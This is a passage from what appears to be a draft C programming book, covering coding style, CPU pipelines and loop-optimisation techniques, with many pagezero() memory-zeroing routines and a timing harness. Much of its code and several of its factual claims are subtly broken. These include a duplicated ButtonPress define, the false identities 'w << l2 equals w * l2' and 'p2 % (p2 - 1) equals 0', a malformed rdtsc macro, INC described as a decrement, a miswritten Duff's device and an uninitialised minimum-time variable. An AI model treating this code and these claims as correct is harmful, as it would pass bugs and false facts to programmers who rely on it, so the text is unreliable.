into and passing pointers them to your functions. This will keep the namespace cleaner
and confusions fewer.
This code snippet reflects how I tend to, to a point, organise things in files. The order
is usually something like described below.
144 CHAPTER 20. A VIEW ON STYLE
Source Files
#include statements
globals
function implementations
Header Files
#include statements
typedef statements
function prototypes
function-like macros
constant macros
aggregate type (struct and union) declarations
20.5 Other Conventions
use comments to tell what the code does without getting too detailed
use narrow scope; use static for local scope (used within a file) identifiers; try
to stick close to one file per module (or perhaps a source file + header ), e.g.
mem.c andmem.h for memory management
usemacros ; hiding peculiar things such as creative bit operations makes them
easier to reuse (and if put into header files, keeps them from hurting your eyes
when reading the actual code) :)
avoid ’ magic numbers ’; define macros for constants in code for better maintain-
ability
usetypedef sparingly; keep things easier to grasp at first sight
avoid code repetition and deep nesting; use macros; pay attention to program
flow
use parentheses around macro arguments in macro bodies to avoid hard-to-find
mistakes with macro evaluation
enclose macros which use ifinside do /* macro body */ while (0) to avoid
unexpected behavior with else and else if
do ... while (0)
To illustrate the last convention, it is good to use
#define mymacro(x) \
do { \
if (x) printf("cool\n") else printf("bah\n"); \
} while (0)
or, perhaps better still
20.5. OTHER CONVENTIONS 145
#define mymacro(x) \
do { \
if (x) { \
printf("cool\n"); \
} else { \
printf("bah\n"); \
}
} while (0)
instead of
#define mymacro(x) \
if (x) printf("cool\n") else printf("bah\n")
146 CHAPTER 20. A VIEW ON STYLE
Part IX
Code Optimisation
147

Chapter 21
Execution Environment
21.1 CPU Internals
In this section, we shall take a quick look on some hardware-level optimisation tech-
niques which processors use commonly.
21.1.1 Prefetch Queue
Prefetch queues are used to read chunks of instruction data at a time. It’s a good idea
not to use many branching constructs , i.e. jump around in code, to keep the CPU
from not having to flush its prefetch queue often.
21.1.2 Pipelines
Processor units use pipelining to execute several operations in parallel. These oper-
ations, micro-ops, are parts of actual machine instructions. A common technique to
make code ’pipeline’ better, i.e. run faster, is to avoid data dependencies in adjacent
operations. This means that the target operands should not be source operands for
the next instruction (or operation at ’high’ level such as C code). Ordering operations
properly reduces pipeline stalls (having to wait for other operations to complete to
continue), therefore making code execute more in parallel and faster.
21.1.3 Branch Prediction
TODO
149
150 CHAPTER 21. EXECUTION ENVIRONMENT
Chapter 22
Optimisation Techniques
Even though careful coding will let you avoid having to apply some of these techniques,
it is still good to know about them for the cases where you deal with code either written
by other people or by yourself earlier; one learns and becomes better all the time by
doing; in this case, a better programmer by programming.
22.1 Data Dependencies
A Few Words on Memory
Note that memory has traditionally been, and still is to a point, much slower to access
than registers. Proper memory access works word by word within alignment require-
ments. Memory traversal such as zeroing pages should benefit from
Removing Data Dependency on Pointer
while (i--) {
ptr[0] = 0;
ptr[1] = 0;
ptr[2] = 0;
ptr[3] = 0;
ptr += 4;
}
over
while (i--) {
*ptr++ = 0;
*ptr++ = 0;
*ptr++ = 0;
*ptr++ = 0;
}
because the next memory transfer does not depend on a new pointer value. It often
pays to organise memory access in code, just like it’s good to organise instructions so
151
152 CHAPTER 22. OPTIMISATION TECHNIQUES
as to do something creative before using the last computation’s results. This technique
is called data dependency elimination.
22.2 Recursion Removal
Here is the modified first example program for a hypothetical programming game we
are developing codenamed Cyberhack. :)
void
start(void)
{
run(rnd(memsz));
}
void
run(unsigned int adr)
{
int myid = 0x04200420;
int *ptr = (int *)adr;
ptr[0] = myid;
ptr[1] = myid;
ptr[2] = myid;
ptr[3] = myid;
run(rnd(memsz));
}
As the experienced eye should see, this would lead to quite a bit of stack usage; run()
calls itself tail-recursively (recursion at end). Every call will generate a new stack
frame, which leads to indefinitely growing stack.
Stack Bloat After N Calls to run()
retadr return address to caller
prevfp caller’s frame pointer
> ... <
retadr Nth stack frame
prevfp Nth stack frame
You should, instead, use something like
void
start(void)
{
for ( ; ; ) {
run(rnd(memsz));
}
}
void
22.3. CODE INLINING 153
run(unsigned int adr)
{
int myid = 0x04200420;
int *ptr = (int *)adr;
ptr[0] = myid;
ptr[1] = myid;
ptr[2] = myid;
ptr[3] = myid;
return;
}
22.3 Code Inlining
inline-keyword
C99 introduced (and systems widely used it before) the keyword inline . This is a hint
to the compiler to consider inlining functions.
Let’s look at the example of C in the end of the previous chapter. We call run() once
per loop iteration from start() . Instead, it’s a good idea to use
void
run(void)
{
int myid = 0x04200420;
for ( ; ; ) {
int *ptr = (int *)rnd(memsz);
ptr[0] = myid;
ptr[1] = myid;
ptr[2] = myid;
ptr[3] = myid;
}
}
In this final example, we get by with only one stack frame for run() .
Inlining Code
The idea of inlining code is to avoid function calls, especially for small operations and
ones that are done often (say, from inside loops).
Macros can be used for extreme portability, but __inline__ and related attributes have
been around for so long already (not in C89) that they are often a better bet; macros are
next to impossible to debug.
Here is a GCC example. rdtsc() was first introduced in the chapter Inline Assembly
elsewhere in this book. This is an example that uses inline in concert with static in
header files, so the declaration is only visible in one file at a time.
154 CHAPTER 22. OPTIMISATION TECHNIQUES
static __inline__ uint64_t
rdtsc(void)
{
rdtsc_t tsval;
__asm__ ("rdtsc\n"
"movl %%eax, %0\n"
"movl %%edx, %1\n"
: "=m" (tsval.u32[0]),
"=m" (tsval->u32[1])
: /* no INPUT field */
: "eax", "edx");
return tsval.u64;
}
Here is the same code changed to a macro. This one works even with compilers not
supporting the use of keywords such as inline or__inline__ .
/* write RDTSC to address tp in memory */
#define rdtsc(tp) \
__asm__ ("rdtsc\n" \
"movl %%eax, %0\n \
"movl %%edx, %1\n" \
: "=m" ((tp)->u32[0]) \
"=m" ((tp)->u32[1]) \
: /* no INPUT field */ \
: "eax", "edx")
22.4 Unrolling Loops
This section describes a technique which good compilers utilise extensively.
Chances are you don’t need to unroll by hand, but I think it’s good to see how to do it
and even a good compiler might not do it when you want to.
This section represents use of so-called Duff’s device .
22.4.1 Basic Idea
The idea of loop unrolling is to run the code for several loop iterations during one.
This is to avoid loop-overhead, mostly of checking if the loop is to be reiterated, and
perhaps, with modern CPUs, to utilise pipeline-parallelism better.
I will illustrate loop unrolling with a simplified piece of code to set memory to zero
(a common operation to initialise global data structures as well as those one gets from
malloc(); the latter can be asked to be zeroed explicitly by using calloc()). This one
assumes sizeof(long); for a better version, see section Duff’s Device below.
Source Code
22.5. BRANCHES 155
void
pagezero(void *addr, size_t len)
{
long *ptr = addr;
long val = 0;
long incr = 4;
len >>= 4;
while (len--) {
ptr[0] = val;
ptr[1] = val;
ptr[2] = val;
ptr[3] = val;
ptr += incr;
}
}
22.5 Branches
As a rule of thumb, if and when you have to use branches, order them so that the most
likely ones are listed first. This way, you will do fewer checks for branches not to be
taken.
22.5.1 if - else if - else
It pays to put the most likely branches (choices) to be taken as far up in the flow as
possible.
22.5.2 switch
Switch is useful, e.g. for implementing Duff’s devices.
22.5.2.1 Duff’s Device
Duff’s Device
Duff’s device can best be demonstrated by how to use it. Here is a version of our
function pagezero() above programmed using one. Pay attention to how the switch
falls through when not using break to terminate it. This example also attempts to
figure out sizeof(long) at compile-time by consulting compiler implementation’s type
limits.
Source Code
156 CHAPTER 22. OPTIMISATION TECHNIQUES
/* use Duff's device for unrolling loop */
#include <stdint.h>
#include <limits.h>
/* determine size of long */
#if (ULONG_MAX == 0xffffffffUL)
#define LONGBITS 32
#elif (ULONG_MAX == 0xffffffffffffffffUL)
#define LONGBITS 64
#else
#error pagezero not supported for your word-size /* don't compile */
#endif
void
pagezero(void *addr, size_t len)
{
long *ptr = addr;
long val = 0;
long incr = 4;
#if (LONGBITS == 32)
long mask = 0x0000000fL;
#elif (LONGBITS == 64)
long mask = UINT64_C(0x00000000000000ffL);
#endif
#if (LONGBITS == 32)
len >>= 4;
#elif (LONGBITS == 64)
len >>= 5;
#endif
while (len) {
/* Duff's device */
switch (len & mask) {
case 0:
ptr[3] = val;
case 1:
ptr[2] = val;
case 2:
ptr[1] = val;
case 3:
ptr[0] = val;
}
ptr += incr;
len--;
}
}
22.5. BRANCHES 157
22.5.3 Jump Tables
Sometimes there’s a way to get around branching with if - elseif - else or switch state-
ments by making close observations on the values you decide branch targets on.
As an example, I’ll show you how to optimise event loops, which practically all X11
clients (application programs) use.
Here, the thing to notice is that instead of the possibly worst case of doing something
like
XEvent ev;
XNextEvent(disp, &event);
if (ev.type == Expose) {
/* handle Expose events */
} else if (ev.type == ButtonPress) {
/* handle ButtonPress events */
} else if (ev.type == ButtonRelease) {
/* handle ButtonRelease events */
} /* and so forth. */
which can easily grow into a dozen else if branches or more,
one could do something like
/* ... */
switch (ev.type) {
case Expose:
/* handle Expose events */
break;
case ButtonPress:
/* handle ButtonPress events */
break;
case ButtonRelease:
/* handle ButtonRelease events */
break;
/* and so on */
default:
break;
}
which a good compiler might find a way to optimise to a jump table, it’s worth one’s
attention to take a look at event number definitions in <X11/X.h>
/* excerpts from <X11/X.h> */
/* ... */
#define ButtonPress 4
#define ButtonPress 5
158 CHAPTER 22. OPTIMISATION TECHNIQUES
/* ... */
#define Expose 12
/* ... */
#define LASTEvent 36 /* must be bigger than any event # */
As we can see, not only are event numbers small integral constants greater than 0 (0
and 1 are reserved for protocol errors and replies), but an upper limit for them is also
defined. Therefore, it is possible, for standard (i.e. non-extension) Xlib events, to do
something like
#include <X11/X.h>
/* event handlers take event pointer argument */
typedef void evfunc_t(XEvent *);
evfunc_t evftab[LASTEvent]; /* zeroed at startup */
evfunc_t *evfptr;
XEvent ev;
XNextEvent(disp, &ev);
evfptr = evftab[ev->type]
if (evfptr) {
evfptr(&ev);
}
Function Pointers
In short, we typedef (for convenience) a new type for event handler function pointers
and use event numbers to index a table of them. In case we find a non-zero (non-NULL)
pointer, there is a handler set for the event type and we will call it, passing a pointer to
our just-read event to it. Not only is the code faster than the earlier versions, but it is
also cleaner and more elegant if you ask me.
Dynamic Approach
It is also possible to extend this scheme to handle extension events if you allocate the
handler function pointer table dynamically at run time.
22.6 Bit Operations
In these examples, the following conventions are used
Variable Requirements Notes
p2 power of two one 1-bit, the rest are zero
l2 base-2 logarithm
w integral value
w ^ w equals 0.
w ^ 0xffffffff equals ~w.
if l2 raised by 2 is p2 and w is unsigned,
22.6. BIT OPERATIONS 159
w >> l2 is equal to w / p2 and
w << l2 is equal to w * l2.
if and only if p2 is power of two,
p2 % (p2 - 1) equals 0.
~0x00000000L equals 0xffffffffL [equals (-1L)].
Notes
ISO C standard states results of right shifts of negative values are undefined.
The C standard also doesn’t specify whether right shifts are logical (fill with
zero) or arithmetic (fill high bits with sign).
22.6.1 Karnaugh Maps
TODO : show how to use Karnaugh maps to optimise Boolean stuff.
22.6.2 Techniques and Tricks
I will start this section with what seems a somewhat rarely used trick.
A double-linked list item typically has two pointers in each item; prev and next, which
point to the previous and next item in a list, respectively. With a little bit magic and
knowing one of the pointers at access time, we can pack two pointers into one integral
value (probably of the standard type uintptr_t).
pval = (uintptr_t)ptr1 ^ (uintptr_t)ptr2;
/* do something here */
/* pval properties */
p1 = (void *)(pval ^ (uintptr_t)ptr2);
p2 = (void *)(pval ^ (uintptr_t)ptr1);
We can also remove one of the value by XORing the value of their XOR with the other
one, so
op1 = (void *)(pval ^ p2); // op1 == ptr1
op2 = (void *)(pval ^ p1); // op2 == ptr2
would give us the original values of ptr1 and ptr2.
In other words, the XOR logical function is used so that XORing the packed value with
one pointer evaluates to the integral value of the second one.
Note that you can’t remove items from the middle of a list implemented using this
technique if you don’t know the address of either the previous or next item. Hence,
you should only use it for lists when you operate by traversing them in order. This
could be useful for a kernel pager LRU queues; the list would allow us to add (push)
160 CHAPTER 22. OPTIMISATION TECHNIQUES
page item just allocated or paged in front of the queue and remove (dequeue) pages to
be written out from the back. The structure would then serve as a stack as well as a
simplified two-end list.
This looks fruitful; a trivial structure for implementing such a list would look like
struct page {
uintptr_t adr;
struct page *prev;
struct page *next;
};
This would be changed to
struct page {
uintptr_t adr;
uintptr_t xptr; // XOR of prev and next.
};
If we have a table of such structures, we may not even need the address field; the
address space is linear and if there is a structure for every page starting from the address
zero and pagetab is a pointer to the table , we can do
#define PTRPGBITS 12 // i386
/* calculate page address from structure offset */
#define pageadr(pp) \
((uintptr_t)((pp) - (pagetab)) << PTRPGBITS)
/* minimal page structure */
struct page {
uintptr_t xptr; // XOR of prev and next.
};
The i386 has virtual address space of 1024 * 1024 pages, so the savings compared
to the first version are (1024 * 1024 * 64 bits) which is 8 megabytes; we’d only use
4 megabytes instead of 12 for the page structure table, and even the second version
would use 8.
22.7 Small Techniques
22.7.1 Constant Folding
22.7.2 Code Hoisting
Loop invariant motion
Taking everything unnecessary out of loops, especially inner ones, can pay back nicely.
A good compiler should know to do this, but it’s still good to know what is going on.
do {
*ptr++ = 0;
22.8. MEMORY ACCESS 161
} while (ptr < (char *)dest + nb);
We can hoist the addition out of the loop continuation test.
char *lim = (char *)dest + nb;
do {
*ptr++ = 0;
} while (ptr < lim);
22.8 Memory Access
C programmers see memory as flat table of bytes. It is good to access memory in as
big units as you can; this is about words, cachelines, and ultimately pages.
22.8.1 Alignment
As a rule of thumb, align to the size of the item aligned; e.g.
Alignment Common Types
1-byte int8_t, uint8_t, char, unsigned char
2-byte int16_t, uint16_t, short
4-byte int32_t, uint32_t, int, long for 32-bit
8-byte int64_t, uint64_t, long on 64-bit , long long
16-byte long double if 128-bit
Assumed Type Sizes
The table above lists sized-types (recommended), but also common assumptions to
make it easier for you to read existing code or write code for older pre-C99 compilers.
22.8.2 Access Size
Try to keep memory access sizes aligned to word, cacheline, and page boundaries.
Keep closely-related data close in memory not to use too many cachelines. Access
memory in words rather than bytes where possible ( alignment! ).
22.8.2.1 Alignment
Many systems raise a signal on unaligned word access of memory, and even the ones
that don’t will need to read two words and combine the result. Therefore, keep your
word access aligned to word boundaries at all times.
if p2 is power of two, a pointer is
aligned to p2-boundary if
((uintptr_t)ptr & ((p2) - 1)) == 0
This leads to the macro
162 CHAPTER 22. OPTIMISATION TECHNIQUES
#define aligned(p, p2) \
(((uintptr_t)(p) & ((p2) - 1)) == 0)
Which can also be written as
#define aligned(p, p2) \
(!((uintptr_t)(p) & ((p2) - 1)))
Which one of these two forms is more readable is a matter of taste.
22.8.3 Cache
Typical microprocessors have 2-3 levels of cache memory running at different speeds.
The L1 (on-die) cache is the fastest. Memory is read into cache a cacheline or stride
at a time; on a typical IA-32 architecture, the cacheline is 32 bytes , i.e. 256 bits. By
using local cache parameters and word-access wisely, you can have good wins in code
run speeds.
22.8.3.1 Cache Prewarming
Pentium Writeback Trick
Interestingly, it looks like some Pentium-class systems such as my AMD Athlon XP,
seem to write cachelines faster if they read the first item of the cacheline to be written
into a register first. For example, see the sections on pagezero() below. The trick is to
make sure the cacheline is in cache memory to avoid writing to main memory directly
with the Pentium writeback semantics. It depends on the application whether this usage
of the cache speeds things up.
22.9 Code Examples
22.9.1 pagezero()
Here I make a few assumptions to simplify things. This could be used verbatim at
kernel-level as the name of the function, pagezero , suggests.
The requirements (which make all but the trivial version unuseful as implementations
ofmemset() , an implementation of which is found elsewhere in this book), for this
function are
TODO: fix item #3
The region to be zeroed must be aligned to a boundary of long, i.e. its address is
an even multiple of sizeof(long).
The size of the region is a multiple of sizeof(long).
In the unrolled versions, the size of the region must be a multiple of 4 * sizeof(long).
22.9. CODE EXAMPLES 163
Note that even though some of these implementations may seem silly, I have seen most
if not all of them reading code. Everyone makes mistakes and has to end improving
things if, say, deadlines are to be met. After all, computer programming is an ongoing
learning process which is one of the reasons it can be so satisfactory. It also seems
good to look at slower code to see how it can be improved.
22.9.1.1 Algorithms
pagezero1()
In short, we set memory to 0 a long at a time. This is the trivial and slowest version.
Source Code
/* we assume sizeof(long) is 4 */
void
pagezero1(void *adr, size_t len)
{
long *ptr = adr;
len >>= 2;
while (len--) {
*ptr++ = 0;
}
}
pagezero2()
Let us unroll the loop to make the code run faster.
Source Code
void
pagezero2(void *adr, size_t len)
{
long *ptr = adr;
len >>= 2;
while (len) {
*ptr++ = 0;
*ptr++ = 0;
*ptr++ = 0;
*ptr++ = 0;
len -= 4;
}
}
pagezero3()
Let us, without thinking of it twice, replace the subtraction of 4 from len because INC
164 CHAPTER 22. OPTIMISATION TECHNIQUES
(decrement by one) might be a faster machine instruction than SUB (generic subtrac-
tion).
Source Code
void
pagezero3(void *adr, size_t len)
{
long *ptr = adr;
len >>= 4;
while (len--) {
*ptr++ = 0;
*ptr++ = 0;
*ptr++ = 0;
*ptr++ = 0;
}
}
As DIV (division) tends to be a very slow operation and 4 is a power of two, I also used
len >> 4;
instead of
len /= 16;
or, better
len /= 4 * sizeof(long);
which a good compiler should do as well.
This may be a bit better, but still quite pathetic.
pagezero4()
There’s a data dependency on ptr, whose value changes right after we use it and so
right before we use it again. Fortunately, it is easy to eliminate this speed issue.
Let’s try
Source Code
void
pagezero4(void *adr, size_t len)
{
long *ptr = adr;
size_t ofs = 0;
len >>= 4;
while (len--) {
ptr[ofs] = 0;
ptr[ofs + 1] = 0;
ptr[ofs + 2] = 0;
ptr[ofs + 3] = 0;
22.9. CODE EXAMPLES 165
ptr += 4;
}
}
pagezero5()
Again, this looks better. However, as you can see, we are doing unnecessary calcula-
tions adding constants to ofs. Time to change the code again. As it turns out, we don’t
need the variable ofs at all.
Source Code
void
pagezero5(void *adr, size_t len)
{
long *ptr = adr;
len >>= 4;
while (len--) {
ptr[0] = 0;
ptr[1] = 0;
ptr[2] = 0;
ptr[3] = 0;
ptr += 4;
}
}
There’s at least one more reason why this should be better than the previous version in
addition to the fact that we eliminated a variable and a bunch of addition operations;
IA-32 supports indexed addressing with immediate 8-bit index constants (embedded to
machine instructions), and a good compiler should make this version use 8-bit imme-
diate indices.
pagezero6()
There is still one more thing a good compiler should do that I will show for the sake
of your knowledge. Let us eliminate the possibility of a non-optimising compiler (or
optimising one running with the optimisations turned off, which is common practice
when compiling code to be debuggable) doing the memory writes by replicating a
MOV with the constant zero as immediate operand.
Source Code
void
pagezero6(void *adr, size_t len)
{
long *ptr = adr;
long val = 0;
len >>= 4;
while (len--) {
ptr[0] = val;
166 CHAPTER 22. OPTIMISATION TECHNIQUES
ptr[1] = val;
ptr[2] = val;
ptr[3] = val;
ptr += 4;
}
}
Now, with a bit of luck, val is assigned a register, the instructions [without the imme-
diate operands] shorter and so the loop more likely to use less code cache to reduce
’trashing’ it, and last but not least, the size of the compiled binary should be smaller.
pagezero7()
As one more change, let’s try replacing the increment constant 4 within the loop with a
variable (hopefully register). Note that most of the time, the register keyword should
not be used because it forces compilers to allocate a register for the whole runtime
of the function, therefore making the set of available registers for other computations
smaller.
Source Code
void
pagezero7(void *adr, size_t len)
{
long *ptr = adr;
long val = 0;
long incr = 4;
len >>= 4;
while (len--) {
ptr[0] = val;
ptr[1] = val;
ptr[2] = val;
ptr[3] = val;
ptr += incr;
}
}
pagezero8()
This version of the routine adds a bit of portability. Note that you can’t use sizeof(long)
to define LONGBITS ; this makes the code need to be modified for different systems;
not a hard thing to port.
pagezero8() also moves the loop counter decrement [by one] operation to the end of
the loop; it doesn’t need to be executed right after checking it in the beginning.
Source Code
#define LONGBITS 32
void
pagezero8(void *adr, size_t len)
{
22.9. CODE EXAMPLES 167
long *ptr = adr;
long val = 0;
long incr = 4;
#if (LONGBITS == 32)
len >>= 4;
#elif (LONGBITS == 64)
len >>= 5;
#endif
while (len) {
ptr[0] = val;
ptr[1] = val;
ptr[2] = val;
ptr[3] = val;
len--;
ptr += incr;
}
}
pagezero9() and test
I read the good book Inner Loops byRick Booth to learn what my old friend Eric
B. Mitchell calls cache warming ; Rick explains how Pentiums use writeback cache
in a way that they write directly to main memory if the cacheline being written is
not in cache. This is probably the reason a cacheline read before writing the cacheline
dropped pagezero()’s runtime from 12 microseconds for pagezero8() to 9 for pagezero9()
on the system I tested them on. A worthy speedup. Note also how I let memory access
settle for a bit by moving other operations in between reading memory and writing it.
As a Pentium-detail , the beast has 8 data buses to cache, one for each 4-byte entity of
the cacheline, so writes here should use all 8 buses and work fast. With the Pentium
parameters of 32-byte cache lines and 32-bit long words, this loop writes a single cache
line of zeroes each loop iteration.
Some of the header files, such as zen.h needed to build the examples in this book are
represented in the part Code Examples .
Source Code
#include <stdio.h>
#include <stdlib.h>
#include "cdecl.h"
#include "zen.h"
/* we assume sizeof(long) is 4 */
#define LONGBITS 32
uint8_t pagetab[1024 * 1024] __attribute__((__aligned__(4096)));
unsigned long
profzen(void (*routine)(void *, size_t), char *str)
{
168 CHAPTER 22. OPTIMISATION TECHNIQUES
zenclk_t clk;
unsigned long nusec;
unsigned long mintime;
long l;
memset(pagetab, 0xff, sizeof(pagetab));
sleep(1);
for (l = 0 ; l < 1024 ; l++) {
zenstartclk(clk);
routine(pagetab, 65536);
zenstopclk(clk);
nusec = zenclkdiff(clk);
if (nusec < mintime) {
mintime = nusec;
}
}
fprintf(stderr, "%s took %lu microseconds\n", str, mintime);
return nusec;
}
void
pagezero9(void *adr, size_t len)
{
long *next = adr;
long *ptr;
long val = 0;
long incr = 8;
long tmp;
#if (LONGBITS == 32)
len >>= 5;
#elif (LONGBITS == 64)
len >>= 6;
#endif
while (len) {
tmp = *next;
len--;
ptr = next;
ptr[0] = val;
ptr[1] = val;
ptr[2] = val;
ptr[3] = val;
next += incr;
ptr[4] = val;
ptr[5] = val;
ptr[6] = val;
ptr[7] = val;
}
}
22.9. CODE EXAMPLES 169
int
main(int argc, char *argv[])
{
profzen(pagezero9, "pagezero9");
exit(0);
}
22.9.1.2 Statistics
Let’s take a look at the speed of our different versions of the pagezero routine and look
at how to measure execution timer using the Zen timer represented in its own chapter
elsewhere in this book.
Here is a test program; I have included the routines to let you not have to skim this
book back and forth to see how they work, therefore making it easy to compare the
impact of the changes on the run speed.
Note that the tests are run on a multitasking system (without not much other activity,
though). I take the minimum of 1024 runs so I can eliminate the impact of the process
possibly getting scheduled out, i.e. put to sleep, in the middle of the tests. I also try
to avoid this by sleeping (to let the kernel schedule us out, then back in) before I start
running the routine to be tested.
Source Code
TODO: include stats for pagezero8() and pagezero9()
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include "cdecl.h"
#include "zen.h"
#include "zenia32.h"
#define LONGSIZE 4
#define LONGSIZELOG2 2
void
pagezero0(void *adr, size_t len)
{
char *ptr = adr;
while (len--) {
*ptr++ = 0;
}
}
void
170 CHAPTER 22. OPTIMISATION TECHNIQUES
pagezero1(void *adr, size_t len)
{
long *ptr = adr;
len >>= LONGSIZELOG2;
while (len--) {
*ptr++ = 0;
}
}
void
pagezero2(void *adr, size_t len)
{
long *ptr = adr;
len >>= LONGSIZELOG2;
while (len) {
*ptr++ = 0;
*ptr++ = 0;
*ptr++ = 0;
*ptr++ = 0;
len -= 4;
}
}
void
pagezero3(void *adr, size_t len)
{
long *ptr = adr;
len >>= 2 + LONGSIZELOG2;
while (len--) {
*ptr++ = 0;
*ptr++ = 0;
*ptr++ = 0;
*ptr++ = 0;
}
}
void
pagezero4(void *adr, size_t len)
{
long *ptr = adr;
size_t ofs = 0;
len >>= 2 + LONGSIZELOG2;
while (len--) {
ptr[ofs] = 0;
ptr[ofs + 1] = 0;
ptr[ofs + 2] = 0;
22.9. CODE EXAMPLES 171
ptr[ofs + 3] = 0;
ptr += 4;
}
}
void
pagezero5(void *adr, size_t len)
{
long *ptr = adr;
len >>= 2 + LONGSIZELOG2;
while (len--) {
ptr[0] = 0;
ptr[1] = 0;
ptr[2] = 0;
ptr[3] = 0;
ptr += 4;
}
}
void
pagezero6(void *adr, size_t len)
{
long *ptr = adr;
long val = 0;
len >>= 2 + LONGSIZELOG2;
while (len--) {
ptr[0] = val;
ptr[1] = val;
ptr[2] = val;
ptr[3] = val;
ptr += 4;
}
}
void
pagezero7(void *adr, size_t len)
{
long *ptr = adr;
long val = 0;
long incr = 4;
len >>= 2 + LONGSIZELOG2;
while (len--) {
ptr[0] = val;
ptr[1] = val;
ptr[2] = val;
ptr[3] = val;
ptr += incr;
172 CHAPTER 22. OPTIMISATION TECHNIQUES
}
}
//uint8_t pagetab[4096] __attribute__((__aligned__(4096)));
uint8_t *pagetab[128];
unsigned long
profzen(void (*routine)(void *, size_t), char *str)
{
#if (PROFCLK)
zenclk_t clk;
unsigned long cnt;
unsigned long mintime = 0;
long l;
#elif (PROFTICK)
zentick_t tick;
#if (LONGSIZE == 8)
long cnt;
long mintime = 0x7fffffffffffffffL;
#else
long long cnt;
long long mintime = 0x7fffffffffffffffLL;
#endif
long l;
#endif
sleep(1);
for (l = 0 ; l < 128 ; l++) {
pagetab[l] = malloc(4096);
#if (PROFCLK)
zenstartclk(clk);
#elif (PROFTICK)
zenstarttick(tick);
#endif
routine(pagetab[l], 4096);
#if (PROFCLK)
zenstopclk(clk);
cnt = zenclkdiff(clk);
#elif (PROFTICK)
zenstoptick(tick);
cnt = zentickdiff(tick);
#endif
if (cnt < mintime) {
mintime = cnt;
}
}
for (l = 0 ; l < 128 ; l++) {
free(pagetab[l]);
}
#if (PROFCLK)
22.9. CODE EXAMPLES 173
fprintf(stderr, "%s took %lu microseconds\n", str, mintime);
#elif (PROFTICK)
fprintf(stderr, "%s took %lld cycles\n", str, mintime);
#endif
return cnt;
}
void
pagezero8(void *adr, size_t len)
{
long *ptr = adr;
long val = 0;
long incr = 4;
len >>= 2 + LONGSIZELOG2;
while (len) {
ptr[0] = val;
ptr[1] = val;
ptr[2] = val;
ptr[3] = val;
ptr += incr;
len--;
}
}
void
pagezero9(void *adr, size_t len)
{
long *next = adr;
long *ptr;
long val = 0;
long incr = 8;
long tmp;
len >>= 3 + LONGSIZELOG2;
while (len) {
tmp = *next;
len--;
ptr = next;
ptr[0] = val;
ptr[1] = val;
ptr[2] = val;
ptr[3] = val;
next += incr;
ptr[4] = val;
ptr[5] = val;
ptr[6] = val;
ptr[7] = val;
}
174 CHAPTER 22. OPTIMISATION TECHNIQUES
}
void
pagezero10(void *adr, size_t len)
{
long *next1 = adr;
long *next2 = (long *)((uint8_t *)adr + (len >> 1));
long *ptr1;
long *ptr2;
long val = 0;
long incr = 8;
long tmp1;
long tmp2;
len >>= 4 + LONGSIZELOG2;
while (len) {
__builtin_prefetch(next1);
__builtin_prefetch(next2);
// tmp1 = *next1;
// tmp2 = *next2;
len--;
ptr1 = next1;
ptr2 = next2;
ptr1[0] = val;
ptr2[0] = val;
ptr1[1] = val;
ptr2[1] = val;
ptr1[2] = val;
ptr2[2] = val;
ptr1[3] = val;
ptr2[3] = val;
next1 += incr;
next2 += incr;
ptr1[4] = val;
ptr2[4] = val;
ptr1[5] = val;
ptr2[5] = val;
ptr1[6] = val;
ptr2[6] = val;
ptr1[7] = val;
ptr2[7] = val;
}
}
void
pagezero11(void *adr, size_t len)
{
long *next1 = adr;
long *next2 = (long *)((uint8_t *)adr + 2048);
long *next3 = (long *)((uint8_t *)adr + 8 * sizeof(long));
22.9. CODE EXAMPLES 175
long *next4 = (long *)((uint8_t *)adr + 2048 + 8 * sizeof(long));
long *ptr1;
long *ptr2;
long val = 0;
long incr = 8;
len >>= 4 + LONGSIZELOG2;
while (--len) {
__builtin_prefetch(next1);
__builtin_prefetch(next2);
__builtin_prefetch(next3);
__builtin_prefetch(next4);
ptr1 = next1;
ptr2 = next2;
ptr1[0] = val;
ptr2[0] = val;
ptr1[1] = val;
ptr2[1] = val;
ptr1[2] = val;
ptr2[2] = val;
ptr1[3] = val;
ptr2[3] = val;
next1 += incr;
next2 += incr;
next3 += incr;
next4 += incr;
ptr1[4] = val;
ptr2[4] = val;
ptr1[5] = val;
ptr2[5] = val;
ptr1[6] = val;
ptr2[6] = val;
ptr1[7] = val;
ptr2[7] = val;
}
ptr1 = next1;
ptr2 = next2;
ptr1[0] = val;
ptr2[0] = val;
ptr1[1] = val;
ptr2[1] = val;
ptr1[2] = val;
ptr2[2] = val;
ptr1[3] = val;
ptr2[3] = val;
ptr1[4] = val;
ptr2[4] = val;
ptr1[5] = val;
ptr2[5] = val;
ptr1[6] = val;
176 CHAPTER 22. OPTIMISATION TECHNIQUES
ptr2[6] = val;
ptr1[7] = val;
ptr2[7] = val;
}
void
pagezero12(void *adr, size_t len)
{
long *next1 = adr;
long *next2 = (long *)((uint8_t *)adr + 2048);
long *next3 = (long *)((uint8_t *)adr + 8 * sizeof(long));
long *next4 = (long *)((uint8_t *)adr + 2048 + 8 * sizeof(long));
long *ptr1;
long *ptr2;
long val = 0;
long incr = 8;
len >>= 4 + LONGSIZELOG2;
while (--len) {
__builtin_prefetch(next1);
ptr1 = next1;
ptr2 = next2;
__builtin_prefetch(next2);
ptr1[0] = val;
ptr2[0] = val;
ptr1[1] = val;
ptr2[1] = val;
__builtin_prefetch(next3);
ptr1[2] = val;
ptr2[2] = val;
ptr1[3] = val;
ptr2[3] = val;
__builtin_prefetch(next4);
next1 += incr;
next2 += incr;
next3 += incr;
next4 += incr;
ptr1[4] = val;
ptr2[4] = val;
ptr1[5] = val;
ptr2[5] = val;
ptr1[6] = val;
ptr2[6] = val;
ptr1[7] = val;
ptr2[7] = val;
}
ptr1 = next1;
ptr2 = next2;
ptr1[0] = val;
ptr2[0] = val;
22.9. CODE EXAMPLES 177
ptr1[1] = val;
ptr2[1] = val;
ptr1[2] = val;
ptr2[2] = val;
ptr1[3] = val;
ptr2[3] = val;
ptr1[4] = val;
ptr2[4] = val;
ptr1[5] = val;
ptr2[5] = val;
ptr1[6] = val;
ptr2[6] = val;
ptr1[7] = val;
ptr2[7] = val;
}
#if 0 /* BROKEN CODE */
void
pagezero13(void *adr, size_t len)
{
long *next1 = adr;
long *next2 = (long *)((uint8_t *)adr + 4096);
long *next3 = (long *)((uint8_t *)adr + 8 * sizeof(long));
long *next4 = (long *)((uint8_t *)adr + 4096 + 8 * sizeof(long));
long *ptr1;
long *ptr2;
long val = 0;
long incr = 8;
len >>= 4 + LONGSIZELOG2;
while (--len) {
__builtin_prefetch(next1);
ptr1 = next1;
ptr2 = next2;
__builtin_prefetch(next2);
ptr1[0] = val;
